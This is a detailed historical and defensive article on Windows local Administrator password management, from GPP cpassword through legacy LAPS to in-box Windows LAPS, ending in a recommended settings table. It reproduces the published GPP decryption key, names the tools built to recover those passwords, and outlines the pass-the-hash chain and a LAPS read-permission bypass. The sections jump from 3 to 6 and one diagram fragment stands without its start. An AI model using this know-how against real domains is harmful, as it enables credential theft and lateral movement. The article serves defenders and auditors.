1. One Password, Fifty Thousand Laptops

In May 2012, a domain user with twelve lines of PowerShell could read the local Administrator password for every machine in the organisation. The tool was Get-GPPPassword.ps1 [@obscuresec-gpp-2012]. The "encryption" was AES-256-CBC with a 32-byte key Microsoft had published in its own protocol specification [@ms-gppref-aes-key] -- not leaked, published, as a feature, so that third-party Group Policy implementations could read the format. Eleven years later, on April 11, 2023, Microsoft finally shipped the in-box fix [@tc-windows-laps-ga-2023].

This is an article about those eleven years.

A lateral-movement technique in which an attacker uses the NTLM hash of a captured password directly in an authentication exchange, without recovering the cleartext. If the same local Administrator password is reused across a fleet, one dumped hash unlocks every machine. MITRE catalogues the technique as **T1550.002**.

The pattern was old before 2012. Through the 2000s, the only practical way to provision the local Administrator account on a Windows fleet was to bake one shared password into the reference image and ship the image to every endpoint. Helpdesk knew the password. Pentesters guessed at it. And once Benjamin Delpy's Mimikatz had pulled the hash from a single phished workstation in 2011, the rest of the org fell to a single psexec spray. Microsoft documented the threat model precisely in its December 2012 Mitigating Pass-the-Hash whitepaper [@ms-pth-whitepaper], which named the shared local Administrator credential as the architectural enabler of the entire intrusion class [@mitre-t1550-002].

Microsoft also had a fix. It had shipped one in 2008 with Group Policy Preferences (GPP), the feature that could push a per-machine local-admin password from a Group Policy Object to every endpoint. GPP put the password in an XML file in SYSVOL. SYSVOL was world-readable to every authenticated user in the domain. Microsoft encrypted the password with AES-256-CBC -- and then published the key. The result, after a four-author weaponisation chain in mid-2012 [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp], was that GPP made the original problem worse: instead of one shared password recoverable by physical access to a help-desk laptop, it was now one shared password recoverable by any authenticated domain user with a copy of Get-GPPPassword.ps1. Microsoft "patched" it on May 13, 2014 with MS14-025 [@ms14-025-bulletin], which disabled new authoring but deleted nothing already deployed. Twelve years later, PingCastle still finds the artefacts in production AD [@pingcastle-rules].

The first real fix was Generation 2: the legacy Microsoft LAPS, shipped May 1, 2015 as a separate MSI [@ms-advisory-3062591-wayback]. It stored a per-machine random password in the ms-Mcs-AdmPwd attribute on the computer object, marked CONFIDENTIAL [@adsec-laps-2016]. The directory-side ACL was tighter than SYSVOL, but the deployment surface (install on every endpoint, extend the schema, delegate the OU) capped its real coverage; the password sat in plaintext in AD, one DCSync from "plaintext everywhere"; and a delegation pattern that helpdesks regularly issued -- "All Extended Rights" on the computer OU -- silently included read access to the CONFIDENTIAL attribute [@adsec-laps-2016]. SpecterOps modelled that bypass as the ReadLAPSPassword BloodHound edge on August 7, 2018 [@specterops-bh2].

Generation 3 -- Windows LAPS, in-box, no MSI -- shipped on Patch Tuesday April 11, 2023 [@tc-windows-laps-ga-2023] across Windows 11 22H2 and 21H2, Windows 10 22H2, Windows Server 2022, Windows Server 2019, and Windows Server Annual Channel. Windows Server 2016 was explicitly excluded [@ms-laps-overview]. The new architecture wrapped the password with CNG DPAPI's group key-protector against a configurable principal, exposed Microsoft Entra ID as a peer backup directory [@tc-entra-laps-ga-2023], and added a post-authentication rotation primitive that closed the screenshotted-password OPSEC tail on the next managed-account logon [@ms-laps-policy-settings].

The local Administrator account always has the well-known relative identifier (RID) 500 in the machine's SAM, irrespective of any administrative renaming. Renaming the account at the friendly-name level does not change its SID, which is why Windows LAPS resolves the target account by SID and not by name -- and why an empty AdministratorAccountName policy still finds the right account even on a renamed-built-in host.

Key idea: Microsoft knew the right architecture for managing local Administrator passwords in December 2012, when its own Pass-the-Hash whitepaper named the shared-credential pattern as the architectural enabler of lateral movement. It took until April 11, 2023 to ship that architecture as a Windows default. Eleven years is a long time. The intervening generations each solved part of the previous problem and introduced a new one. The 2026 baseline is, for the first time, an OS-default solution rather than an out-of-band one -- and for the first time, the residual attack surface is the actual surface rather than an artefact of incomplete shipping.

gantt dateFormat YYYY-MM-DD axisFormat %Y title Local-administrator password management on Windows, 1998-2026

section Generation 0 -- Imaged-build era
Shared local admin password baked into image          :gen0, 1998-01-01, 2008-02-26

section Generation 1 -- GPP cpassword
Group Policy Preferences ships in WS2008 RTM           :g1a, 2008-02-27, 2014-05-12
Linda Moore re-posts "Passwords in GPP (Updated)"     :milestone, 2009-04-22, 1d
Sogeti / obscuresec / rewtdance / Metasploit chain    :crit, 2012-04-01, 2012-07-31
MS PtH whitepaper v1 (architecture articulated)       :milestone, 2012-12-01, 1d
MS14-025 disables new authoring (no remediation)      :milestone, 2014-05-13, 1d

section Generation 2 -- Legacy MSI LAPS
Microsoft LAPS GA (KB3062591 MSI)                      :g2a, 2015-05-01, 2023-04-10
Metcalf publishes All-Extended-Rights bypass           :milestone, 2016-08-01, 1d
SpecterOps BloodHound 2.0 ships ReadLAPSPassword edge :milestone, 2018-08-07, 1d

section Generation 3 -- In-box Windows LAPS
Windows LAPS ships in-box (AD backup)                  :crit, 2023-04-11, 2026-12-31
Windows LAPS with Entra ID GA                          :milestone, 2023-10-23, 1d
Win 11 24H2 passphrases and Automatic Account Mgmt    :milestone, 2024-10-01, 1d
Win 11 25H2 Administrator Protection (orthogonal)     :milestone, 2025-11-19, 1d

The article that follows traces the architecture of each generation, the attacks each one solved and each one enabled, and what "standard local admin password management" looks like as a 2026 default. To see why this took twenty years, we have to start in 1998, before Active Directory.

2. Origins: Why Every Workstation Had the Same Local-Admin Password (1998-2008)

Picture a system administrator in 2005. They are holding a CD-R labelled Win-Build-7.iso and a sticky note with a 12-character password. Those two artefacts are the entire local-Administrator-credential lifecycle for ten thousand desktops. The CD will be cloned to a USB drive, the USB drive will reseed Norton Ghost, and Ghost will paint the build onto every new workstation the company buys for the next eight months. Each painted machine will boot with the sticky-note password as its built-in local Administrator. Helpdesk knows the password because they typed it into the image. Five hundred field technicians know the password because they have to be able to recover unmanaged laptops off-network. The pentester who shows up in March will know the password by Tuesday lunch.

This was not a deviation. It was the architecture.

Every Windows machine ships with a built-in local Administrator account whose security identifier ends in the **relative identifier 500**. The RID is constant across machines, languages, and SKUs. Renaming the account changes the friendly name but not the RID, so identity-aware tooling (including Windows LAPS) resolves the account by SID rather than by name. Disabling the account is a configuration choice, not a deletion: the account remains in SAM and can be re-enabled at any time.

The mechanics were a function of how Windows was deployed at scale. Microsoft Sysprep /generalize strips a reference image's machine SID before duplication, but it leaves the SAM intact. Whatever local Administrator password sits in the reference image is the local Administrator password on every endpoint painted from that image. Imaging pipelines were built around this: Norton Ghost in the late 1990s, Microsoft Deployment Toolkit (MDT) and later System Center Configuration Manager Operating System Deployment in the 2000s, all assumed the same SAM. Sean Metcalf's December 2015 SYSVOL retrospective walks the era end-to-end and explains why every shop in the world ended up with a single password [@adsec-gpp-2015].

The operational reality kept the pattern alive. Help-desk needed one known credential to break-glass a laptop that had wandered off the corporate network for six months. Field technicians needed one known credential to swap a failed hard drive on a roof-top kiosk in Houston without phoning home. A known-to-the-org local-admin password was the only realistic fallback path, and the alternative -- a different password per machine, stored somewhere retrievable -- required a retrieval primitive Microsoft had not yet shipped.

The threat model that made the trade-off catastrophic did not get articulated by Microsoft itself until December 2012, in version 1 of the Pass-the-Hash whitepaper [@ms-pth-whitepaper]. The chain was already common knowledge in offensive-security circles: phish a single user, run Benjamin Delpy's 2011-vintage Mimikatz to pull credentials from LSASS, capture the NT hash of the built-in Administrator account, replay that hash to every other host via psexec or wmiexec, and pivot up to the first server an enterprise admin has touched. MITRE catalogues the default-account abuse as T1078.001 [@mitre-t1078-001] and the hash-replay step as T1550.002 [@mitre-t1550-002]. The whitepaper's recommended controls included exactly the architecture Microsoft would eventually ship as LAPS: per-machine random local-admin passwords, rotated frequently, retrievable only by an authorised principal.

The hard part was never the cryptography. It was the operations. A pre-2008 sysadmin who proposed "let's give every workstation a random local-Administrator password" was correctly told that the answer required, at minimum, a directory-scoped retrieval primitive that did not exist; an ACL model that could distinguish "help-desk can read this for their own OU" from "any authenticated user can read this for the whole forest"; and a rotation pipeline that did not depend on the workstation being on the corporate network. Microsoft would not ship those primitives until 2008 (GPP, badly), 2015 (legacy LAPS, well), and 2023 (Windows LAPS, with encryption-at-rest). Until then, "do not get compromised" was the entire mitigation.

The third-party prehistory matters because it set the terms Microsoft would eventually use. PolicyMaker, the engineering parent of what became Group Policy Preferences, was a product of DesktopStandard Corporation that Microsoft acquired in October 2006 [@adsec-gpp-2015]. Thycotic was founded in 1996 by Jonathan Cogley and shipped its Secret Server vault from the mid-2000s [@kuppingercole-cogley]; Lieberman Software (later acquired by Bomgar in January 2018) had operated as Lieberman and Associates since 1978 [@wikipedia-lieberman]; Quest Software was founded in 1987 in Newport Beach, California and was a public company well before the mid-2000s LAPS prehistory began -- its August 14, 1999 NASDAQ IPO saw its shares surge to $47 in a single Wall Street session [@wikipedia-quest; @latimes-quest-ipo-1999]. None of those vendors solved the local-admin-on-every-Windows-machine problem from inside the OS, and Microsoft's own first-party tooling -- restricted groups, logon scripts, Group Policy Object security templates -- offered no rotation primitive at all. The gap was not a knowledge gap; it was a first-party-feature gap.

In February 2008, Microsoft shipped Windows Server 2008. With it came Group Policy Preferences -- and with GPP came a "Local Users and Groups" preference that could push a per-machine local-admin password from a domain GPO to every endpoint in scope. It was the first first-party rotation mechanism Microsoft had ever shipped. It made the problem dramatically worse.

3. Decoration Is Not Encryption: GPP cpassword (2008-2012)

Microsoft Server 2008 reached release-to-manufacturing in February 2008. Group Policy Preferences shipped with it. The new "Local Users and Groups" preference -- alongside Scheduled Tasks, Services, Data Sources, Drive Maps, and Printers -- could push a password from a GPO down to every endpoint in scope. The password went into an XML file in SYSVOL, the domain's replicated policy share. SYSVOL was world-readable to every authenticated user in the domain. The password was AES-256-CBC encrypted in the XML, in a field called cpassword. The key was a 32-byte value published in [MS-GPPREF] section 2.2.1.1.4 [@ms-gppref-aes-key], in Microsoft's own Open Specifications protocol corpus -- as a feature, so that third-party Group Policy implementations could interoperate.

A file share replicated to every Domain Controller in an Active Directory domain, used to distribute Group Policy templates and logon scripts. The default share permissions allow **Read** access to every Authenticated User in the forest. Any file placed in SYSVOL is, operationally, readable by every domain user. The XML attribute defined by `[MS-GPPREF]` that carries an encrypted password inside a Group Policy Preferences item. The encryption is AES-256-CBC with a 16-byte zero IV and a static 32-byte key published in the same protocol specification. The name is short for "ciphertext password" and was the canonical search term for finding deployed credentials in SYSVOL between 2012 and 2026. A loadable component on each Windows endpoint that processes one class of Group Policy setting. Each preference type (Local Users and Groups, Scheduled Tasks, Services, etc.) is implemented by its own CSE, which runs during the Group Policy refresh cycle. CSEs read the policy XML out of SYSVOL, decrypt any `cpassword` field locally, and apply the setting to the host.

Microsoft was not unaware. On April 22, 2009, the Group Policy Team blog re-posted (and updated) a piece by Linda Moore titled "Passwords in Group Policy Preferences (Updated)" [@ms-gp-blog-grouppolicy-2009-wayback]. The phrasing is unambiguous.

the password is not secured. Because the password is stored in SYSVOL, all authenticated users have read access to it. -- Linda Moore, Group Policy Team blog, April 22, 2009 [@ms-gp-blog-grouppolicy-2009-wayback]

The post recommended a list of mitigations: prefer secure mechanisms, audit who can read the SYSVOL share, prefer not to use the field at all. None of those mitigations could rotate the key. None could revoke the static AES-256 key value published in [MS-GPPREF]. Microsoft was telling its customers, in 2009, three years and eight months before the public weaponisation, that the credential they were storing was decryptable by every user in the domain by design.

Three years later, the offensive-security community spent twelve weeks turning the publication into a default-on red-team primitive.

In April and May of 2012, Emilien Girault of Sogeti ESEC published a Python decryptor on the firm's research blog [@sogeti-2012-wayback]. The site has since been retired and the canonical reference is the Wayback Machine capture. In mid-May 2012, Chris Campbell (@obscuresec) published Get-GPPPassword.ps1, a PowerShell port that fetched the relevant XML from SYSVOL, decoded the base64, and called .NET's AES primitives with the published key [@obscuresec-gpp-2012]. The script was folded into PowerSploit at Exfiltration/Get-GPPPassword.ps1, where its header still reads "Author: Chris Campbell (@obscuresec)" [@powersploit-getgpppwd] and explicitly credits Emilien Girault for the underlying research. In June 2012, Ben Campbell (the rewtdance.blogspot.com blog handle), working with scriptmonkey (a named collaborator with his own blog at blog.owobble.co.uk), extended the attack to all six XML wire-format carriers that [MS-GPPREF] permits [@rewtdance-gpp-2012]. The rewtdance post body credits the collaboration verbatim: "Working with scriptmonkey (http://blog.owobble.co.uk/), who already had a DC configured, we verified this theory." On July 25, 2012, the Metasploit module post/windows/gather/credentials/gpp.rb landed [@metasploit-gpp] with five co-authors: Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix. A companion auxiliary scanner, auxiliary/scanner/smb/smb_enum_gpp.rb, was authored independently by Joshua D. Abraham of Praetorian [@metasploit-smb-enum-gpp].

Note: A widespread folk attribution credits Get-GPPPassword.ps1 to "scriptjunkie." The primary sources do not support that claim. The PowerSploit script header credits Chris Campbell (@obscuresec) [@powersploit-getgpppwd]; the rewtdance June 2012 follow-up is by Ben Campbell with scriptmonkey as a named collaborator (scriptmonkey blogs at blog.owobble.co.uk, not at rewtdance) [@rewtdance-gpp-2012]; the Metasploit gpp.rb module's author field names Ben Campbell, Loic Jaquemet, scriptmonkey, theLightCosine, and mubix [@metasploit-gpp]; and the smb_enum_gpp scanner is by Joshua D. Abraham [@metasploit-smb-enum-gpp]. No primary source ties "scriptjunkie" (Matt Weeks) to the GPP cpassword research chain at all. The names are similar; the people are different.

The whole exercise was twelve lines of code. The interesting part was not the cryptography. The interesting part was that the operation was decryption-by-reference: with a published key, the AES envelope was not protecting a secret, it was carrying a secret in a format the protocol specification told everyone how to read.

``` 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b ``` These bytes are reproduced verbatim from Microsoft's published `[MS-GPPREF]` Group Policy Preferences specification [@ms-gppref-aes-key]. They have appeared in the public Microsoft Open Specifications corpus since the `[MS-GPPREF]` protocol document was first published as part of the Windows Server 2008 protocol-documentation programme; the earliest tangible third-party reuse of the key dates to the April-July 2012 Sogeti / obscuresec / rewtdance / Metasploit research chain [@sogeti-2012-wayback; @obscuresec-gpp-2012; @rewtdance-gpp-2012; @metasploit-gpp]. The key is *not* a secret; it is an interoperability primitive.

ReadSucceeds["Read succeeds (silent CONTROL_ACCESS bypass)"]
ReadFails["Read fails (correctly ACL-gated)"]
Endpoint --> GPRefresh
GPRefresh --> Rotate
Rotate --> SAMWrite
Rotate --> ADWrite
ADWrite --> LDAPRead
LDAPRead --> Bypass
Bypass -- yes --> ReadSucceeds
Bypass -- no --> ReadFails

The other structural limit was the directory's own integrity boundary. The password sat in plaintext in the directory. A stolen NTDS.dit -- obtained via DCSync, NTDSUtil dump, or physical theft of a DC's disk -- exposed every managed local-Administrator password in the forest at once. There was no encryption-at-rest in legacy LAPS, by design. The trust model was "the directory is tier 0 and DCSync is a domain-compromise event already," which is operationally true and architecturally lazy.

Microsoft fixed both of those structural defects on April 11, 2023. The fix shipped in the operating system, with no MSI. We come to it next.

6. The In-Box Era: Windows LAPS (April 11, 2023 to Present)

Patch Tuesday, April 11, 2023. The April cumulative update for Windows 11 22H2 was KB5025239. The Windows 11 21H2 update was KB5025224. Windows 10 22H2 was KB5025221. Windows Server 2022 was KB5025230. Windows Server 2019 was KB5025229. The Server Annual Channel shipped it too. Windows Server 2016 was, and remains, explicitly excluded -- the per-SKU April-2023 cumulative-update KB numbers are catalogued in the Tenable retrospective on the Windows LAPS GA wave [@tc-windows-laps-ga-2023] and the official Microsoft LAPS overview page [@ms-laps-overview]. The MSI was gone. The admpwd.dll Client-Side Extension was gone. In its place: exactly three OS binaries -- laps.dll for core LAPS logic, lapscsp.dll for the Microsoft Intune Configuration Service Provider, and lapspsh.dll for the LAPS PowerShell module -- all shipped together, all part of the OS, all available without installing anything [@ms-laps-concepts-overview; @tc-windows-laps-ga-2023]. The Microsoft Learn laps-concepts-overview page enumerates the three binaries verbatim and lists no fourth.

The most consequential architectural change is the one most often missed.

Note: The legacy admpwd.dll was a Group Policy CSE; its rotation cycle was driven by the GP refresh interval (90 minutes plus jitter on member computers). The new laps.dll is not a CSE. It runs on a hard-coded in-process background timer of approximately one hour inside laps.dll itself -- not a Windows Task Scheduler task, and not configurable. The cited Microsoft Learn page is unambiguous: "Windows LAPS uses a background task that wakes up every hour to process the currently active policy. This task isn't implemented with a Windows Task Scheduler task and isn't configurable." The polling cycle is decoupled from the Group Policy refresh cycle entirely [@ms-laps-concepts-overview]. The implications: the rotation cadence is not configurable below one hour; reducing the GP refresh interval does not accelerate LAPS rotation; the Task Scheduler library will not show a LAPS task because there isn't one; and Windows LAPS will rotate a password on an off-network domain-joined machine the moment it re-establishes line-of-sight to a Domain Controller, regardless of whether a GP refresh has fired.

The new schema added six attributes to the Computer object: msLAPS-Password (the plaintext-fallback location), msLAPS-EncryptedPassword (the CNG-DPAPI-wrapped ciphertext blob), msLAPS-EncryptedPasswordHistory (rotation history), msLAPS-PasswordExpirationTime, msLAPS-EncryptedDSRMPassword (Directory Services Restore Mode account on a DC), and msLAPS-EncryptedDSRMPasswordHistory [@ms-laps-concepts-overview]. The DSRM pair is a Windows-LAPS-only capability; legacy LAPS never covered Domain Controller DSRM accounts. The schema extension is performed once per forest by Update-LapsADSchema, which is idempotent and coexists with the legacy ms-Mcs-AdmPwd attribute [@ms-laps-mig-scenarios].

A seventh attribute, msLAPS-CurrentPasswordVersion, exists in the Windows Server 2025 forest schema only. It is added automatically when the first Windows Server 2025 Domain Controller is promoted -- not by running Update-LapsADSchema -- and is used by laps.dll to mitigate a virtual-machine-snapshot torn-state class. The attribute is read-only as far as the LAPS feature is concerned and is not part of the ReadLAPSPassword BloodHound edge's calculus [@ms-laps-concepts-overview].

Encryption-at-rest with CNG DPAPI

The load-bearing addition is encryption of the password before it leaves the client. The mechanism is the CNG DPAPI group key-protector (still commonly called DPAPI-NG in Microsoft's older documentation) [@ms-cng-dpapi]. The client generates the new local-Administrator password, then wraps the plaintext against a security principal SID using the Active Directory Key Distribution Service (KDS) root key infrastructure. The wrapped blob is the only thing the LDAP write places into msLAPS-EncryptedPassword. To decrypt, a reader Kerberos-authenticates to the KDC; only members of the configured principal group at decryption time can derive the protector. The directory itself never sees plaintext, and a stolen NTDS.dit yields ciphertext only [@ms-laps-concepts-overview].

A protection mechanism in Windows's CNG (Cryptography API: Next Generation) Data Protection API in which a payload is encrypted against a security principal -- typically an AD group SID -- rather than against a local user. Decryption is gated by Kerberos authentication and the principal's group membership at the time of decryption [@ms-cng-dpapi]. Microsoft Learn currently spells the primitive *"CNG DPAPI"* on the canonical reference; older Microsoft documentation and Win32 references continue to use the shorthand *"DPAPI-NG"*. They are the same primitive.

There are two policy settings that gate the encryption path, and the failure modes are operationally important.

Note: Microsoft Learn's laps-management-policy-settings page lists ADPasswordEncryptionEnabled with a default of True [@ms-laps-policy-settings]. The genuine failure mode is not an unset default; it is silent fallback to plaintext in msLAPS-Password when (a) the forest's Domain Functional Level is below Windows Server 2016, or (b) the BackupDirectory value is not 2 (AD). Configure the policy explicitly anyway: the explicit configuration makes the choice visible to policy audits and forces the operator to verify the DFL prerequisite. Do not flip a bit that is already True; do verify the prerequisites that make True work.

Note: When ADPasswordEncryptionPrincipal is unspecified, Windows LAPS wraps the password against the Domain Admins group of the computer's domain [@ms-laps-concepts-overview; @ms-laps-policy-settings]. Most fleets do not want every Domain Admin to be a routine LAPS reader. Configure a dedicated, audited, minimum-membership decryption group (a common naming convention is LAPS-DPAPI-Decryptors) and assign it explicitly. Decryption authority is delegated separately from LDAP read authority; minimising membership of the decryption group is the single most useful hardening lever on a Windows LAPS deployment.

The backup-directory choice

The CSP / GPO node `BackupDirectory` selects where Windows LAPS writes the rotated password. The three valid values are **0** (do not back up; passwords rotate locally but are not retrievable), **1** (Microsoft Entra ID via the `deviceLocalCredentials` resource on Microsoft Graph), and **2** (Active Directory via the `msLAPS-*` attribute set). The values are mutually exclusive per device; a hybrid-joined device can choose either backend but not both [@ms-laps-policy-settings; @ms-laps-entra-scenarios].

The Entra-backup path went generally available on October 23, 2023 [@tc-entra-laps-ga-2023]. With BackupDirectory = 1, the local LAPS component posts the rotated password to the deviceLocalCredentials resource on the device object in Microsoft Entra ID via the Microsoft Graph API [@ms-graph-localcredinfo]. Retrieval is via Get-LapsAADPassword (a thin wrapper over the Graph endpoint), the Entra portal Devices blade, or a direct GET /directory/deviceLocalCredentials/{deviceId} call [@ms-laps-entra-scenarios].

The Entra-backup path has a seven-day minimum for PasswordAgeDays. The AD-backup path's minimum is one day. A tier-0 fleet that targets daily rotation on Entra-joined endpoints will not get daily rotation -- Entra-side policy validation rejects the value. Section 7's baseline table reflects this asymmetry.

Policy surface and the FQ-anchored corrections

Windows LAPS is configurable via Group Policy (for AD-joined hosts), the LAPS Configuration Service Provider at ./Device/Vendor/MSFT/LAPS/Policies/* for Intune-managed hosts [@ms-laps-csp], local policy, or the legacy LAPS GPO if PolicySourceMode selects emulation mode. The settings include BackupDirectory, PasswordComplexity (values 1 through 8), PasswordLength, PasswordAgeDays, PostAuthenticationActions, PostAuthenticationResetDelay, AdministratorAccountName, PassphraseLength, ADPasswordEncryptionEnabled, ADPasswordEncryptionPrincipal, and ADBackupDSRMPassword. On Windows 11 24H2 and Windows Server 2025 and later, the policy surface adds Automatic Account Management settings: AutomaticAccountManagementEnabled, AutomaticAccountManagementNameOrPrefix, AutomaticAccountManagementRandomizeName, AutomaticAccountManagementTarget, and AutomaticAccountManagementEnableAccount [@ms-laps-policy-settings; @ms-laps-account-modes].

The action Windows LAPS performs after the managed account has authenticated to the host. Valid values are **1** (reset the password), **3** (reset and sign out the interactive session; default), **5** (reset and reboot, with a one-minute reboot delay), and **11** (reset, sign out, and terminate remaining processes; Windows 11 24H2 / Windows Server 2025 and later). The action fires after `PostAuthenticationResetDelay` hours have elapsed since the authentication that triggered it [@ms-laps-policy-settings].

Note: A widespread misreading of the older Microsoft documentation lists PostAuthenticationActions as a 1-2-3 enum. The correct enumeration per the current Microsoft Learn reference [@ms-laps-policy-settings] is 1 (reset password), 3 (reset + sign out; default), 5 (reset + reboot), and 11 (reset + sign out + terminate remaining processes; Win 11 24H2 / Server 2025+). Value 11 is not "force shutdown without warning"; interactive users receive the same non-configurable two-minute warning as on value 3, and remaining processes are terminated after the warning expires. SMB sessions on the host are deleted on values 3 and 11.

PostAuthenticationResetDelay defaults to 24 hours. The range is 0 to 24 hours; a value of 0 disables the post-authentication action entirely [@ms-laps-policy-settings]. A tier-0 fleet aiming to close the screenshotted-password OPSEC tail aggressively will configure this down to 1 hour; tier-2 deployments typically leave it at 8 or 24.

PasswordComplexity values 5 through 8 (Windows 11 24H2+ / Windows Server 2025+)

PasswordComplexity values 1 through 4 are character-class modes (uppercase only; uppercase plus lowercase; uppercase plus lowercase plus numbers; and -- value 4, the default -- all four character classes). Value 5 is not a "no vowels or numbers" mode, despite a common folk attribution; it is the "improved readability" four-class variant of value 4, equivalent to value 4 with the visually ambiguous glyphs I, O, Q, l, o, 0, 1 removed and the symbols :, =, ?, * added [@ms-laps-passwords-passphrases]. Microsoft's own documented example password for value 5 is vnJ!!?MTb5=U7Y -- which retains vowels and digits 2 through 9. Values 6, 7, and 8 are passphrase modes drawn from a Microsoft-curated wordlist derived from the EFF Diceware wordlists [@eff-dice; @eff-wordlists-2016] with internal modifications. The published word counts after Microsoft's curation are 7776 / 1276 / 1276 for modes 6 / 7 / 8 respectively; the EFF originals (the EFF Long Wordlist, EFF Short Wordlist #1, and EFF Short Wordlist #2 published July 2016) are 7776 / 1296 / 1296 [@eff-dice; @eff-wordlists-2016]. Values 5 through 8 are all gated on Windows 11 24H2 / Windows Server 2025 and later -- not only values 6-8. The cited Microsoft Learn page reads verbatim for value 5: "The PasswordComplexity setting of '5' is only supported in Windows 11 24H2, Windows Server 2025, and later releases." [@ms-laps-passwords-passphrases]. Passphrase modes exist for DSRM-account scenarios where the password must be typed by a human under duress; the article's section 7 baseline recommends them for tier-0 break-glass accounts.

PowerShell surface and one important cmdlet name

The native LAPS PowerShell module ships eight cmdlets the article calls out by name: Get-LapsADPassword, Reset-LapsPassword, Update-LapsADSchema, Set-LapsADAuditing, Set-LapsADComputerSelfPermission, Set-LapsADReadPasswordPermission, Set-LapsADResetPasswordPermission, and Find-LapsADExtendedRights [@ms-laps-ps-overview; @ms-laps-get-adpassword]. The auditing cmdlet is Set-LapsADAuditing -- not Set-LapsADAuditingSettings, which does not exist as a cmdlet name [@ms-laps-set-adauditing]. The Entra-backup retrieval cmdlet is Get-LapsAADPassword, a wrapper around Microsoft Graph.

Note: A common copy-paste error in deployment runbooks is to write Set-LapsADAuditingSettings. The cmdlet name is Set-LapsADAuditing [@ms-laps-set-adauditing], and the cmdlet emits Directory Service audit event 4662 on configured attribute reads. The SACL it installs targets the LAPS attribute set; you still need the host-side Audit Directory Service Access subcategory enabled on Domain Controllers for the event to land in the Security log.

Migration coexistence

Legacy LAPS and Windows LAPS can coexist on the same host only if they target different local accounts. The documented coexistence pattern is to run legacy LAPS against the built-in RID 500 Administrator while introducing Windows LAPS against a named secondary local-admin account, then retire the legacy MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. The cross-pointer in section 11 details the seven-step migration sequence.

flowchart TD Tick["laps.dll background timer (~1 hr)"] ReadPolicy["Read effective policy
CSP > GPO > local > legacy emulation"] BackupDir{"BackupDirectory
1 (Entra) / 2 (AD) / 0?"} EntraPath["Write to Graph deviceLocalCredentials
(min PasswordAgeDays = 7)"] ADPath["Write to msLAPS-* attribute set
(min PasswordAgeDays = 1)"] EncryptionGate{"ADPasswordEncryptionEnabled = True
AND DFL ≥ Server 2016?"} Encrypted["msLAPS-EncryptedPassword
(DPAPI-NG, principal = ADPasswordEncryptionPrincipal)"] Plaintext["msLAPS-Password (plaintext fallback)"] SetSAM["Set SAM password on
AdministratorAccountName (empty = RID 500)"] Auth["Managed account authenticates"] PAA{"PostAuthenticationActions
0 / 1 / 3 / 5 / 11?"} Wait["Wait PostAuthenticationResetDelay (default 24 h)"] Action1["1: reset password"] Action3["3: reset + sign out, 2-min warning, DEFAULT"] Action5["5: reset + reboot, 1-min delay"] Action11["11: reset + sign out + terminate procs (24H2 / WS2025+)"] Tick --> ReadPolicy ReadPolicy --> BackupDir BackupDir -- 1 --> EntraPath BackupDir -- 2 --> EncryptionGate BackupDir -- 0 --> SetSAM EncryptionGate -- yes --> Encrypted EncryptionGate -- no --> Plaintext EntraPath --> SetSAM Encrypted --> SetSAM Plaintext --> SetSAM SetSAM --> Auth Auth --> Wait Wait --> PAA PAA -- 1 --> Action1 PAA -- 3 --> Action3 PAA -- 5 --> Action5 PAA -- 11 --> Action11

With the in-box era settled, what does a 2026 deployment actually look like? A short list of policy settings, and a slightly longer list of footguns.

7. The 2026 Baseline as a Settings Table

Architecture is interesting. Audits are not. Here is the 2026 settings table that, in production, separates a deployment that meets its goal from one that quietly does not. Every row carries the policy node, the documented default, the recommended tier-2 value (a typical end-user fleet), the recommended tier-0 value (Domain Controllers and break-glass), and the citation. Cross-check the row against the Microsoft Learn policy-settings page before you ship it.

Policy	Default	Recommended (tier 2)	Recommended (tier 0)	Why	Citation
`BackupDirectory`	`0` (no backup)	`2` (AD) for AD-joined and hybrid-joined; `1` (Entra) for pure Entra-joined	same as tier 2	One directory per device; AD for hybrid where on-prem identity is canonical	[@ms-laps-policy-settings]
`PasswordComplexity`	`4` (all character classes)	`4`	`6` (3-word passphrase) for accounts a human must type under duress (DSRM / break-glass); `4` for automated retrieval	Passphrases for human typing; character-set for tool-only retrieval. Values 5 through 8 are gated on Windows 11 24H2 / Windows Server 2025 and later: value 5 is the "improved-readability" four-class variant of 4 (not a "no vowels" mode); values 6/7/8 are passphrase modes with Microsoft-curated EFF-derived wordlists of 7776 / 1276 / 1276 entries (EFF originals: 7776 / 1296 / 1296)	[@ms-laps-passwords-passphrases; @eff-dice; @eff-wordlists-2016]
`PasswordLength`	`14`	`24`	`24`	Eliminates the rainbow-table threat class	[@ms-laps-passwords-passphrases]
`PasswordAgeDays`	`30` (1-day minimum AD; 7-day minimum Entra; 365-day max)	`30`	`1` (AD) / `7` (Entra; lower fails policy validation)	Caps the blast radius of an undetected credential theft to one rotation window	[@ms-laps-policy-settings]
`PostAuthenticationActions`	`3` (reset + sign out)	`3`	`3`, or `11` on Win 11 24H2+ if process termination is required	Closes the screenshot-leak OPSEC tail on the next managed-account interactive logon. Value `11` is not "force shutdown without warning" -- it is reset + sign out + terminate remaining processes with the same two-minute warning as `3`	[@ms-laps-policy-settings]
`PostAuthenticationResetDelay`	`24` (hours)	`8`	`1`	Trade-off between operational task completion and exposure window	[@ms-laps-policy-settings]
`ADPasswordEncryptionEnabled`	`True` per Microsoft Learn's defaults table -- not off-by-default	`True`, configured explicitly so the choice is visible in policy audits and the DFL prerequisite is verified	same	The genuine failure mode is silent fallback to plaintext when DFL is below Server 2016 or `BackupDirectory` is not `2`, not a default-off bit	[@ms-laps-policy-settings; @ms-laps-csp]
`ADPasswordEncryptionPrincipal`	`Domain Admins` of the computer's domain when unspecified	Dedicated `LAPS-DPAPI-Decryptors` group, not Domain Admins	same, with PIM-gated activation	Decryption authority is delegated separately from LDAP read; minimise membership	[@ms-laps-concepts-overview]
`AdministratorAccountName`	empty (manages built-in RID 500)	empty on Server SKUs; named account (e.g. `lapsadmin`) on Client SKUs with the built-in disabled	On Win 11 24H2 / WS2025+, prefer Automatic Account Management with random name and disabled-by-default	Defeats predictable-RID-500 enumeration	[@ms-laps-policy-settings; @ms-laps-account-modes]
`ADBackupDSRMPassword`	`False`	n/a (member servers)	`True` on Domain Controllers	Brings DSRM-account management into LAPS scope -- a capability legacy LAPS never had	[@ms-laps-concepts-overview]

